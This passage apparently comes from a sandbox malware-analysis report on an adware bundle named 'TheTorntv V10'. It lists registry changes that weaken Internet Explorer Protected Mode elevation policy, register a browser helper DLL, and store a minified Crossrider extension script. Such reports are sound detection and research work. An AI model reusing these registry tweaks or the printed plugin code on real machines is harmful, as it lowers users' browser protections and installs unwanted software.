\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e8c59608-deae-41f7-83a8-7a00ad4c556a}\Policy = "3" Bodprv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\Policy = "3" GoogleUpdate.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION Bodprv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\ = "8000" Bodprv.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{66677745-b57a-4780-9bdc-77335f091741} Bodprv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12c6d5df-53e6-4c04-a804-b79439878095}\Policy = "3" Bodprv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e8c59608-deae-41f7-83a8-7a00ad4c556a}\AppName = "TheTorntv V10-buttonutil64.exe" Bodprv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\AppPath = "C:\\Program Files (x86)\\globalUpdate\\Update\\1.3.25.0" GoogleUpdate.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{BDAEC487-B7C8-4335-AF31-11F227847C30}\AppPath = "C:\\Program Files (x86)\\TheTorntv V10" 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{66677745-b57a-4780-9bdc-77335f091741}\AppPath = "C:\\Program Files (x86)\\TheTorntv V10" Bodprv.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A} GoogleUpdate.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Isolation = "PMIL" 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{3DC6B674-2DA2-4B10-B21D-B32B7CBA7DBB}\AppPath = "C:\\Program Files (x86)\\TheTorntv V10" 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0cd21c16-5dc6-499e-a2e9-25ca35a21a52}\AppName = "TheTorntv V10-bg.exe" Bodprv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12c6d5df-53e6-4c04-a804-b79439878095}\Policy = "3" Bodprv.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298} GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\AppPath = "C:\\Program Files (x86)\\globalUpdate\\Update" GoogleUpdate.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\Policy = "3" GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0cd21c16-5dc6-499e-a2e9-25ca35a21a52}\AppPath = "C:\\Program Files (x86)\\TheTorntv V10" Bodprv.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0cd21c16-5dc6-499e-a2e9-25ca35a21a52}\AppPath = "C:\\Program Files (x86)\\TheTorntv V10" Bodprv.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0cd21c16-5dc6-499e-a2e9-25ca35a21a52}\Policy = "1" Bodprv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e8c59608-deae-41f7-83a8-7a00ad4c556a}\AppPath = "C:\\Program Files (x86)\\TheTorntv V10" Bodprv.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{BDAEC487-B7C8-4335-AF31-11F227847C30} 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{BDAEC487-B7C8-4335-AF31-11F227847C30}\AppName = "06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe-buttonutil.exe" 06c2d203-8730-401c-be3d-3556ebb7cdb0-2.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0cd21c16-5dc6-499e-a2e9-25ca35a21a52} Bodprv.exe -
Modifies data under HKEY_USERS 3 IoCs
Processes:
msiexec.exedescription ioc process Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1E\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f msiexec.exe -
Modifies registry class 64 IoCs
Processes:
Bodprv.exeregsvr32.exeregsvr32.exeGoogleUpdate.exeGoogleUpdate.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft Bodprv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{66666666-6666-6666-6666-660666336611} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220622332211}\InprocServer32\ = "C:\\Program Files (x86)\\TheTorntv V10\\TheTorntv V10-bho64.dll" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\AppID = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\ Bodprv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32\ThreadingModel = "Both" GoogleUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\ProgID GoogleUpdate.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\177\JavaScript = "\n(function(){if(!(appAPI.isMatchPages&&appAPI.isMatchPages(\"*crossrider.com/extension_dashboard/dashboard.html\"))){return;}function o(p){return String(p).replace(/</g,\"<\").replace(/>/g,\">\");}function e(aR,aC){function aW(){while(aE.length&&(aE[aE.length-1]===\" \"||aE[aE.length-1]===aT)){aE.pop();}}function aq(p){return p===\"[EXPRESSION]\"||p===\"[INDENTED-EXPRESSION]\";}function af(p){return p.replace(/^\\s\\s*|\\s\\s*$/,\"\");}function an(q){aQ.eat_next_space=false;if(ag&&aq(aQ.mode)){return;}q=typeof q===\"undefined\"?true:q;aQ.if_line=false;aW();if(!aE.length){return;}if(aE[aE.length-1]!==\"\\n\"||!q){ac=true;aE.push(\"\\n\");}for(var p=0;p<aQ.indentation_level;p+=1){aE.push(aT);}if(aQ.var_line&&aQ.var_line_reindented){if(ar===\" \"){aE.push(\" \");}else{aE.push(aT);}}}function at(){if(aQ.eat_next_space){aQ.eat_next_space=false;return;}var p=\" \";if(aE.length){p=aE[aE.length-1];}if(p!==\" \"&&p!==\"\\n\"&&p!==aT){aE.push(\" \");}}function aM(){ac=false;aQ.eat_next_space=false;var p;if(false){switch(aU){case\"TK_STRING\":p=\"#036A07\";break;case\"TK_WORD\":if(aN==\"true\"||aN==\"false\"){p=\"#585CF6\";}else{if(aN==\"function\"){p=\"#0000FF\";}else{if(parseFloat(aN)){p=\"#0000CD\";}}}break;default:break;}}aE.push(false?\"<span\"+(p?' style=\"color: '+p+';\"':\"\")+\">\"+aN+\"</span>\":aN);}function ao(){aQ.indentation_level+=1;}function am(){if(aE.length&&aE[aE.length-1]===aT){aE.pop();}}function aF(p){if(aQ){aK.push(aQ);}aQ={previous_mode:aQ?aQ.mode:\"BLOCK\",mode:p,var_line:false,var_line_tainted:false,var_line_reindented:false,in_html_comment:false,if_line:false,in_case:false,eat_next_space:false,indentation_baseline:-1,indentation_level:aQ?aQ.indentation_level+(aQ.var_line&&aQ.var_line_reindented?1:0):aj};}function aq(p){return p===\"[EXPRESSION]\"||p===\"[INDENTED-EXPRESSION]\";}function ad(p){return p===\"[EXPRESSION]\"||p===\"[INDENTED-EXPRESSION]\"||p===\"(EXPRESSION)\";}function aa(){az=aQ.mode===\"DO_BLOCK\";if(aK.length>0){aQ=aK.pop();}}function aw(q,p){for(var r=0;r<p.length;r+=1){if(p[r]===q){return true;}}return false;}function Y(){var q=0,p=0;for(var r=aE.length-1;r>=0;r--){switch(aE[r]){case\":\":if(q===0){p++;}break;case\"?\":if(q===0){if(p===0){return true;}else{p--;}}break;case\"{\":if(q===0){return false;}q--;break;case\"(\":case\"[\":q--;break;case\")\":case\"]\":case\"}\":q++;break;}}}function G(){ay=0;if(aA>=ai){return[\"\",\"TK_EOF\"];}ap=false;var z=aI.charAt(aA);aA+=1;var H=ag&&aq(aQ.mode);if(H){var v=0;while(aw(z,aO)){if(z===\"\\n\"){aW();aE.push(\"\\n\");ac=true;v=0;}else{if(z===\"\t\"){v+=4;}else{v+=1;}}if(aA>=ai){return[\"\",\"TK_EOF\"];}z=aI.charAt(aA);aA+=1;}if(aQ.indentation_baseline===-1){aQ.indentation_baseline=v;}if(ac){var F;for(F=0;F<aQ.indentation_level+1;F+=1){aE.push(aT);}if(aQ.indentation_baseline!==-1){for(F=0;F<v-aQ.indentation_baseline;F++){aE.push(\" \");}}}}else{while(aw(z,aO)){if(z===\"\\n\"){ay+=1;}if(aA>=ai){return[\"\",\"TK_EOF\"];}z=aI.charAt(aA);aA+=1;}if(aL){if(ay>1){for(F=0;F<ay;F+=1){an(F===0);ac=true;}}}ap=ay>0;}if(aw(z,aG)){if(aA<ai){while(aw(aI.charAt(aA),aG)){z+=aI.charAt(aA);aA+=1;if(aA===ai){break;}}}if(aA!==ai&&z.match(/^[0-9]+[Ee]$/)&&(aI.charAt(aA)===\"-\"||aI.charAt(aA)===\"+\")){var D=aI.charAt(aA);aA+=1;var r=G(aA);z+=D+r[0];return[z,\"TK_WORD\"];}if(z===\"in\"){return[z,\"TK_OPERATOR\"];}if(ap&&aD!==\"TK_OPERATOR\"&&!aQ.if_line&&(aL||aH!==\"var\")){an();}return[z,\"TK_WORD\"];}if(z===\"(\"||z===\"[\"){return[z,\"TK_START_EXPR\"];}if(z===\")\"||z===\"]\"){return[z,\"TK_END_EXPR\"];}if(z===\"{\"){return[z,\"TK_START_BLOCK\"];}if(z===\"}\"){return[z,\"TK_END_BLOCK\"];}if(z===\";\"){return[z,\"TK_SEMICOLON\"];}if(z===\"/\"){var q=\"\";var B=true;if(aI.charAt(aA)===\"*\"){aA+=1;if(aA<ai){while(!(aI.charAt(aA)===\"*\"&&aI.charAt(aA+1)&&aI.charAt(aA+1)===\"/\")&&aA<ai){z=aI.charAt(aA);q+=z;if(z===\"\\r\"||z===\"\\n\"){B=false;}aA+=1;if(aA>=ai){break;}}}aA+=2;if(B){return[\"/*\"+q+\"*/\",\"TK_INLINE_COMMENT\"];}else{return[\"/*\"+q+\"*/\",\"TK_BLOCK_COMMENT\"];}}if(aI.charAt(aA)===\"/\"){q=z;while(aI.charAt(aA)!==\"\\r\"&&aI.charAt(aA)!==\"\\n\"){q+=aI.charAt(aA);aA+=1;if(aA>=ai){break;}}aA+=1;if(ap){an();}return[q,\"TK_COMMENT\"];}}if(z===\"'\"||z==='\"'||z===\"/\"&&(aD===\"TK_WORD\"&&aw(aH,[\"return\",\"do\"])||aD===\"TK_START_EXPR\"||aD===\"TK_START_BLOCK\"||aD===\"TK_END_BLOCK\"||aD===\"TK_OPERATOR\"||aD===\"TK_EQUALS\"||aD===\"TK_EOF\"||aD===\"TK_SEMICOLON\")){var A=z;var E=false;var s=z;if(aA<ai){if(A===\"/\"){var x=false;while(E||x||aI.charAt(aA)!==A){s+=aI.charAt(aA);if(!E){E=aI.charAt(aA)===\"\\\\\";if(aI.charAt(aA)===\"[\"){x=true;}else{if(aI.charAt(aA)===\"]\"){x=false;}}}else{E=false;}aA+=1;if(aA>=ai){return[s,\"TK_STRING\"];}}}else{while(E||aI.charAt(aA)!==A){s+=aI.charAt(aA);if(!E){E=aI.charAt(aA)===\"\\\\\";}else{E=false;}aA+=1;if(aA>=ai){return[s,\"TK_STRING\"];}}}}aA+=1;s+=A;if(A===\"/\"){while(aA<ai&&aw(aI.charAt(aA),aG)){s+=aI.charAt(aA);aA+=1;}}return[s,\"TK_STRING\"];}if(z===\"#\"){var p=\"#\";if(aA<ai&&aw(aI.charAt(aA),aP)){do{z=aI.charAt(aA);p+=z;aA+=1;}while(aA<ai&&z!==\"#\"&&z!==\"=\");if(z===\"#\"){}else{if(aI.charAt(aA)===\"[\"&&aI.charAt(aA+1)===\"]\"){p+=\"[]\";aA+=2;}else{if(aI.charAt(aA)===\"{\"&&aI.charAt(aA+1)===\"}\"){p+=\"{}\";aA+=2;}}}return[p,\"TK_WORD\"];}}if(z===\"<\"&&aI.substring(aA-1,aA+3)===\"\"){aQ.in_html_comment=false;aA+=2;if(ap){an();}return[\"-->\",\"TK_COMMENT\"];}if(aw(z,aS)){while(aA<ai&&aw(z+aI.charAt(aA),aS)){z+=aI.charAt(aA);aA+=1;if(aA>=ai){break;}}if(z===\"=\"){return[z,\"TK_EQUALS\"];}else{return[z,\"TK_OPERATOR\"];}}return[z,\"TK_UNKNOWN\"];}var aI,aE,aN,aD,aH,aB,aV,aQ,aK,aT;var aO,aG,aS,aA,aJ,aP;var ax,aU,az;var ap,ac,ay;aC=aC?aC:{};var ab=aC.braces_on_own_line?aC.braces_on_own_line:false;var ah=aC.indent_size?aC.indent_size:4;var ar=aC.indent_char?aC.indent_char:\" \";var aL=typeof aC.preserve_newlines===\"undefined\"?true:aC.preserve_newlines;var aj=aC.indent_level?aC.indent_level:0;var au=aC.space_after_anon_function===\"undefined\"?false:aC.space_after_anon_function;var ag=typeof aC.keep_array_indentation===\"undefined\"?false:aC.keep_array_indentation;ac=false;var ai=aR.length;aT=\"\";while(ah>0){aT+=ar;ah-=1;}aI=aR;aV=\"\";aD=\"TK_START_EXPR\";aH=\"\";aB=\"\";aE=[];az=false;aO=\"\\n\\r\t \".split(\"\");aG=\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_$\".split(\"\");aP=\"0123456789\".split(\"\");aS=\"+ - * / % & ++ -- = += -= *= /= %= == === != !== > < >= <= >> << >>> >>>= >>= <<= && &= | || ! !! , : ? ^ ^= |= ::\".split(\" \");aJ=\"continue,try,throw,return,var,if,switch,case,default,for,while,break,function\".split(\",\");aK=[];aF(\"BLOCK\");aA=0;while(true){var Z=G(aA);aN=Z[0];aU=Z[1];if(aU===\"TK_EOF\"){break;}switch(aU){case\"TK_START_EXPR\":if(aN===\"[\"){if(aD===\"TK_WORD\"||aH===\")\"){if(aw(aH,aJ)){at();}aF(\"(EXPRESSION)\");aM();break;}if(aQ.mode===\"[EXPRESSION]\"||aQ.mode===\"[INDENTED-EXPRESSION]\"){if(aB===\"]\"&&aH===\",\"){if(aQ.mode===\"[EXPRESSION]\"){aQ.mode=\"[INDENTED-EXPRESSION]\";if(!ag){ao();}}aF(\"[EXPRESSION]\");if(!ag){an();}}else{if(aH===\"[\"){if(aQ.mode===\"[EXPRESSION]\"){aQ.mode=\"[INDENTED-EXPRESSION]\";if(!ag){ao();}}aF(\"[EXPRESSION]\");if(!ag){an();}}else{aF(\"[EXPRESSION]\");}}}else{aF(\"[EXPRESSION]\");}}else{aF(\"(EXPRESSION)\");}if(aH===\";\"||aD===\"TK_START_BLOCK\"){an();}else{if(aD===\"TK_END_EXPR\"||aD===\"TK_START_EXPR\"||aD===\"TK_END_BLOCK\"||aH===\".\"){}else{if(aD!==\"TK_WORD\"&&aD!==\"TK_OPERATOR\"){at();}else{if(aV===\"function\"){if(au){at();}}else{if(aw(aH,aJ)||aH===\"catch\"){at();}}}}}aM();break;case\"TK_END_EXPR\":if(aN===\"]\"){if(ag){if(aH===\"}\"){am();aM();aa();break;}}else{if(aQ.mode===\"[INDENTED-EXPRESSION]\"){if(aH===\"]\"){aa();an();aM();break;}}}}aa();aM();break;case\"TK_START_BLOCK\":if(aV===\"do\"){aF(\"DO_BLOCK\");}else{aF(\"BLOCK\");}if(ab){if(aD!==\"TK_OPERATOR\"){if(aH==\"return\"){at();}else{an(true);}}aM();ao();}else{if(aD!==\"TK_OPERATOR\"&&aD!==\"TK_START_EXPR\"){if(aD===\"TK_START_BLOCK\"){an();}else{at();}}else{if(aq(aQ.previous_mode)&&aH===\",\"){an();}}ao();aM();}break;case\"TK_END_BLOCK\":aa();if(ab){an();aM();}else{if(aD===\"TK_START_BLOCK\"){if(ac){am();}else{aW();}}else{an();}aM();}break;case\"TK_WORD\":if(az){at();aM();at();az=false;break;}if(aN===\"function\"){if((ac||aH===\";\")&&aH!==\"{\"){ay=ac?ay:0;for(var av=0;av<2-ay;av++){an(false);}}}if(aN===\"case\"||aN===\"default\"){if(aH===\":\"){am();}else{aQ.indentation_level--;an();aQ.indentation_level++;}aM();aQ.in_case=true;break;}ax=\"NONE\";if(aD===\"TK_END_BLOCK\"){if(!aw(aN.toLowerCase(),[\"else\",\"catch\",\"finally\"])){ax=\"NEWLINE\";}else{if(ab){ax=\"NEWLINE\";}else{ax=\"SPACE\";at();}}}else{if(aD===\"TK_SEMICOLON\"&&(aQ.mode===\"BLOCK\"||aQ.mode===\"DO_BLOCK\")){ax=\"NEWLINE\";}else{if(aD===\"TK_SEMICOLON\"&&ad(aQ.mode)){ax=\"SPACE\";}else{if(aD===\"TK_STRING\"){ax=\"NEWLINE\";}else{if(aD===\"TK_WORD\"){ax=\"SPACE\";}else{if(aD===\"TK_START_BLOCK\"){ax=\"NEWLINE\";}else{if(aD===\"TK_END_EXPR\"){at();ax=\"NEWLINE\";}}}}}}}if(aD!==\"TK_END_BLOCK\"&&aw(aN.toLowerCase(),[\"else\",\"catch\",\"finally\"])){an();}else{if(aw(aN,aJ)||ax===\"NEWLINE\"){if(aH===\"else\"){at();}else{if((aD===\"TK_START_EXPR\"||aH===\"=\"||aH===\",\")&&aN===\"function\"){}else{if(aH===\"return\"||aH===\"throw\"){at();}else{if(aD!==\"TK_END_EXPR\"){if((aD!==\"TK_START_EXPR\"||aN!==\"var\")&&aH!==\":\"){if(aN===\"if\"&&aV===\"else\"&&aH!==\"{\"){at();}else{an();}}}else{if(aw(aN,aJ)&&aH!==\")\"){an();}}}}}}else{if(aq(aQ.mode)&&aH===\",\"&&aB===\"}\"){an();}else{if(ax===\"SPACE\"){at();}}}}aM();aV=aN;if(aN===\"var\"){aQ.var_line=true;aQ.var_line_reindented=false;aQ.var_line_tainted=false;}if(aN===\"if\"||aN===\"else\"){aQ.if_line=true;}break;case\"TK_SEMICOLON\":aM();aQ.var_line=false;aQ.var_line_reindented=false;break;case\"TK_STRING\":if(aD===\"TK_START_BLOCK\"||aD===\"TK_END_BLOCK\"||aD===\"TK_SEMICOLON\"){an();}else{if(aD===\"TK_WORD\"){at();}}aM();break;case\"TK_EQUALS\":if(aQ.var_line){aQ.var_line_tainted=true;}at();aM();at();break;case\"TK_OPERATOR\":var al=true;var ak=true;if(aQ.var_line&&aN===\",\"&&ad(aQ.mode)){aQ.var_line_tainted=false;}if(aQ.var_line){if(aN===\",\"){if(aQ.var_line_tainted){aM();aQ.var_line_reindented=true;aQ.var_line_tainted=false;an();break;}else{aQ.var_line_tainted=false;}}}if(aH===\"return\"||aH===\"throw\"){at();aM();break;}if(aN===\":\"&&aQ.in_case){aM();an();aQ.in_case=false;break;}if(aN===\"::\"){aM();break;}if(aN===\",\"){if(aQ.var_line){if(aQ.var_line_tainted){aM();an();aQ.var_line_tainted=false;}else{aM();at();}}else{if(aD===\"TK_END_BLOCK\"&&aQ.mode!==\"(EXPRESSION)\"){aM();if(aQ.mode===\"OBJECT\"&&aH===\"}\"){an();}else{at();}}else{if(aQ.mode===\"OBJECT\"){aM();an();}else{aM();at();}}}break;}else{if(aw(aN,[\"--\",\"++\",\"!\"])||aw(aN,[\"-\",\"+\"])&&(aw(aD,[\"TK_START_BLOCK\",\"TK_START_EXPR\",\"TK_EQUALS\",\"TK_OPERATOR\"])||aw(aH,aJ))){al=false;ak=false;if(aH===\";\"&&ad(aQ.mode)){al=true;}if(aD===\"TK_WORD\"&&aw(aH,aJ)){al=true;}if(aQ.mode===\"BLOCK\"&&(aH===\"{\"||aH===\";\")){an();}}else{if(aN===\".\"){al=false;}else{if(aN===\":\"){if(!Y()){aQ.mode=\"OBJECT\";al=false;}}}}}if(al){at();}aM();if(ak){at();}if(aN===\"!\"){}break;case\"TK_BLOCK_COMMENT\":var ae=aN.split(/\\x0a|\\x0d\\x0a/);if(/^\\/\\*\\*/.test(aN)){an();aE.push(ae[0]);for(av=1;av<ae.length;av++){an();aE.push(\" \");aE.push(af(ae[av]));}}else{if(ae.length>1){an();}else{at();}for(av=0;av<ae.length;av++){if(av>0){aE.push(\" \");}aE.push(af(ae[av]));an();}}an();break;case\"TK_INLINE_COMMENT\":at();aM();if(ad(aQ.mode)){at();}else{an();}break;case\"TK_COMMENT\":if(ap){an();}else{at();}aM();an();break;case\"TK_UNKNOWN\":aM();break;}aB=aH;aD=aU;aH=aN;}return aE.join(\"\").replace(/[\\n ]+$/,\"\");}if(typeof exports!==\"undefined\"){exports.js_beautify=e;}jQuery(\"#extension_selector\").append('<option value=\"#extension_dashboard_'+appAPI.appInfo.id+'\">'+appAPI.appInfo.name+\"</option>\");jQuery(\"#master\").append('<div id=\"extension_dashboard_'+appAPI.appInfo.id+'\" class=\"extension_dashboard\" style=\"display: none;\"><div class=\"info_div dashboardDivs\"><h3>Info</h3></div><div class=\"extension_js_div dashboardDivs\"><h3>extension.js</h3></div><div class=\"background_js_div dashboardDivs\"><h3>background.js</h3></div><div class=\"databases_div dashboardDivs\"><h3>Databases</h3></div><div class=\"resources_div dashboardDivs\"><h3>Resources</h3></div><div class=\"plugins_div dashboardDivs\"><h3>Plugins</h3></div></div>');function m(){jQuery(\"body\").append('<div class=\"modal-backdrop fade\"></div>');jQuery(\".modal,.modal-backdrop\").addClass(\"in\");var p=setInterval(function(){var q=jQuery(\".bar\");if(q.width()>=500){window.location.reload();clearInterval(p);jQuery(\".progress\").removeClass(\"active\");jQuery(\".modal, .modal-backdrop\").removeClass(\"in\");q.width(0);jQuery(\".modal-backdrop\").remove();}else{q.width(q.width()+200);}},20);}var b=appAPI.installer.getIds();var i=appAPI.installer.getParams();var h=appAPI.internal.debug.getDebugUrl();var c=(function(){var p=appAPI.os.windowsVersion;if((p!=\"X\")&&(p!=\"na\")){if((p)&&(p.length<5)){return p;}}return\"\";})();var d='<h3>General Info</h3><table class=\"table table-bordered\"><tr><tr><td style=\"font-weight: bold; text-align: right; width: 25%;\">ID:</td><td style=\"width: 25%;\">'+appAPI.appInfo.id+'</td><td style=\"font-weight: bold; text-align: right; width: 25%;\" rowspan=\"2\">Verifiers:</td><td style=\"width: 25%;\" rowspan=\"2\">'+(b?\"Installer BIC: \"+b.installer_bic+\"<br>Installer Verifier: \"+b.installer_verifier:\"\")+'</td></tr><tr><td style=\"font-weight: bold; text-align: right;\">Description:</td><td>'+appAPI.appInfo.description+'</td></tr><tr><td style=\"font-weight: bold; text-align: right;\">Name:</td><td>'+appAPI.appInfo.name+'</td><td style=\"font-weight: bold; text-align: right;\" rowspan=\"2\">Installer Params:</td><td rowspan=\"2\">Source ID: '+i.source_id+\"<br>Sub ID: \"+i.sub_id+\"<br>UZID: \"+i.uzid+'</td></tr><tr><td style=\"font-weight: bold; text-align: right;\">Environment:</td><td>'+appAPI.appInfo.environment+'</td></tr><tr><td style=\"font-weight: bold; text-align: right;\">Bic:</td><td>'+appAPI.appInfo.userId+'</td><td style=\"font-weight: bold; text-align: right;\">Installer Version:</td><td>'+appAPI.installer.getInstallerVersion()+'</td></tr><tr><td style=\"font-weight: bold; text-align: right;\">iBic:</td><td>'+(typeof appAPI.installer.getUserId()===\"string\"?appAPI.installer.getUserId():\"null\")+'</td><td style=\"font-weight: bold; text-align: right;\">Is In Debug Mode:</td><td>'+appAPI.isDebugMode()+'</td></tr><tr><td style=\"font-weight: bold; text-align: right;\">Browser:</td><td>'+appAPI.browser.name+'</td><td style=\"font-weight: bold; text-align: right;\" rowspan=\"2\">JS Files URLs in Debug mode:</td><td rowspan=\"2\">'+(h?(h.userCode?\"User Code: \"+h.userCode+\"<br>\":\"\")+(h.backgroundCode?\"Background Code: \"+h.backgroundCode:\"\"):\"\")+'</td></tr><tr><td style=\"font-weight: bold; text-align: right;\">Browser Version:</td><td>'+appAPI.browser.version+'</td></tr><tr><td style=\"font-weight: bold; text-align: right;\">OS:</td><td>'+appAPI.os.name+(c?(\" (\"+c+\") \"):\"\")+'</td><td style=\"font-weight: bold; text-align: right;\">Platform Version:</td><td>'+appAPI.appInfo.platformVersion+\"</td></tr>\"+(appAPI.os.version&&appAPI.os.version!=\"0\"?'<tr><td style=\"font-weight: bold; text-align: right;\">OS Version:</td><td>'+appAPI.os.version+\"</td></tr>\":\"\")+\"</tr></table>\";var k=jQuery('<div class=\"btn btn-info ladda-button\" style=\"min-width: 0;\" data-style=\"expand-left\">Update Extension</div>');k.click(function(){appAPI.internal.forceUpdate();jQuery(this).after('<br><img src=\"assets/img/spinner.gif\">');appAPI.setTimeout(function(){document.location.reload();},3000);});jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .info_div\").html(k);jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .info_div\").append(d);var d='<h3>Versions</h3><table class=\"table table-bordered\" style=\"margin: 0 auto; width: 600px;\"><tr><th style=\"width: 33%;\"></th><th style=\"width: 33%;\">Local</th><th class=\"remote\" style=\"width: 33%;\">Remote</th></tr><tr class=\"versions_row\"><td style=\"font-weight: bold; text-align: right;\">Plugins Version:</td><td class=\"local plugin_version\" style=\"text-align: center;\">'+appAPI.appInfo.pluginsVersion+'</td><td class=\"remote plugin_version\" style=\"text-align: center;\"></td></tr><tr class=\"versions_row\"><td style=\"font-weight: bold; text-align: right;\">Extension.js Version:</td><td class=\"local extension_version\" style=\"text-align: center;\">'+appAPI.appInfo.version+'</td><td class=\"remote extension_version\" style=\"text-align: center;\"></td></tr><tr class=\"versions_row\"><td style=\"font-weight: bold; text-align: right;\">Background.js Version:</td><td class=\"local background_version\" style=\"text-align: center;\">'+appAPI.appInfo.backgroundVersion+'</td><td class=\"remote background_version\" style=\"text-align: center;\"></td></tr></table>';jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .info_div\").append(d);var n=jQuery('<div class=\"btn btn-info\" style=\"margin: 0; min-width: 0;\">Remote (click to view)</div>');n.click(function(){appAPI.request.get({url:\"http://crossrider.com/plugin/apps/manifest/\"+appAPI.appInfo.id+\".xml\",onSuccess:function(r){var q;if(typeof DOMParser!=\"undefined\"){var u=new DOMParser();q=u.parseFromString(r,\"text/xml\");}else{var q=new ActiveXObject(\"Microsoft.XMLDOM\");q.async=false;q.loadXML(r);}var p=q.getElementsByTagName(\"Ver\")[0].firstChild.data;var s=q.getElementsByTagName(\"BackgroundVer\")[0].firstChild.data;var t=q.getElementsByTagName(\"PluginsVer\")[0].firstChild.data==\"NA\"?0:parseInt(q.getElementsByTagName(\"PluginsVer\")[0].firstChild.data);jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .info_div .remote.plugin_version\").html(t);jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .info_div .remote.extension_version\").html(p);jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .info_div 